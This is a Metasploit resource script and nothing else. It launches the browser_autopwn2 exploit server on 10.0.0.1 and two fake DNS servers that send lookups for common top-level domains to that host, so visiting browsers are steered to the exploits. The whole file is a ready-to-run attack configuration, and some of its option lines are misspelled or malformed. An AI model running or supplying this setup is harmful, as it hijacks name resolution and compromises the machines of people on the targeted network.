use auxiliary/server/browser_autopwn2

set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 80
set AUTOPWN_URI /
set MAXEXPLOITCOUNT 25
set HTML::base64 double_pad
set MaxSessionCount 20
set ShowExploitList true
set LPORT 45000
set SRVHOST 10.0.0.1
set SRVPORT 80
set URIPATH /

run -j

use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
set TARGET ACTION BYPASS
set SRVPORT 5353
run -j

use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j
